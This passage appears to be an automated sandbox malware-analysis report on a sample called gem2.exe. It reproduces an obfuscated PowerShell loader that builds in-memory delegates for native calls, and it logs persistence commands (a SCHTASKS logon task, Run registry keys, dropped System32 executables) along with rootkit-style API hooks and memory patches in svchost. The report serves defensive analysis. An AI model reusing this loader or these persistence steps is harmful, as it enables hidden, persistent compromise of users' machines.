Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019FE30 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,QueryPerformanceFrequency,16_2_00000173D019FE30
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_3_000001F5A966B0ED push rcx; retf 003Fh9_3_000001F5A966B0EE
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54B7DFB push rax; retf 14_2_00007FF6A54B7DFC
Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000173D039B0ED push rcx; retf 003Fh16_3_00000173D039B0EE
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019CC0C push rdx; ret 16_2_00000173D019CC0D
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019CC08 push rdi; retn 0004h16_2_00000173D019CC09
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1647DFB push rax; retf 17_2_00007FF7D1647DFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC861A45 pushad ; iretd 31_2_00007FFAAC861AA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC8663FB push ebx; retf 0009h31_2_00007FFAAC86644A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC936A00 pushad ; ret 31_2_00007FFAAC936A01

Persistence and Installation Behavior

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: unknownExecutable created and started: C:\Windows\System32\System-f4855f59e0.exe
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeFile created: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeJump to dropped file
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Windows\System32\System-f4855f59e0.exeJump to dropped file
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Windows\SysWOW64\$LMX-f4855f59e0.exeJump to dropped file
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeJump to dropped file
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Windows\System32\System-f4855f59e0.exeJump to dropped file
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Windows\SysWOW64\$LMX-f4855f59e0.exeJump to dropped file

Boot Survival

barindex
Creates autostart registry keys with suspicious names
Source: C:\Users\user\Desktop\gem2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft-f4855f59e0Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
Source: C:\Users\user\Desktop\gem2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft-f4855f59e0Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft-f4855f59e0Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D030008 value: E9 8B D7 E9 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD790 value: E9 80 28 16 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D040008 value: E9 9B F8 E8 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECF8A0 value: E9 70 07 17 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D050008 value: E9 8B DA E7 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECDA90 value: E9 80 25 18 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D060008 value: E9 4B D6 E6 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD650 value: E9 C0 29 19 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D070008 value: E9 AB D0 E5 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD0B0 value: E9 60 2F 1A 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D080008 value: E9 0B D2 E4 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD210 value: E9 00 2E 1B 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D090008 value: E9 0B D9 E3 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD910 value: E9 00 27 1C 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D0A0008 value: E9 CB D4 E2 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD4D0 value: E9 40 2B 1D 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D0B0008 value: E9 8B D6 E1 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD690 value: E9 80 29 1E 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D0C0008 value: E9 1B F8 E0 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECF820 value: E9 F0 07 1F 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D0D0008 value: E9 2B D9 DF FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD930 value: E9 E0 26 20 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D0E0008 value: E9 0B DA DE FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECDA10 value: E9 00 26 21 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D0F0008 value: E9 EB D4 DD FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD4F0 value: E9 20 2B 22 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D100008 value: E9 5B F2 DC FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECF260 value: E9 B0 0D 23 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D110008 value: E9 2B D5 DB FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD530 value: E9 E0 2A 24 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D120008 value: E9 5B 09 DB FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CED0960 value: E9 B0 F6 24 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D130008 value: E9 4B D4 D9 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD450 value: E9 C0 2B 26 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D140008 value: E9 DB F1 D8 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECF1E0 value: E9 30 0E 27 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D150008 value: E9 CB D1 D7 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD1D0 value: E9 40 2E 28 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2D160008 value: E9 EB D1 D6 FF Jump to behavior
Source: C:\Windows\System32\svchost.exeMemory written: PID: 7628 base: 7FFB2CECD1F0 value: E9 20 2E 29 00 Jump to behavior
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3B230 IsProcessorFeaturePresent,terminate,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_00000173CFC3B230
Source: C:\Users\user\Desktop\gem2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\gem2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $LMXstagerJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
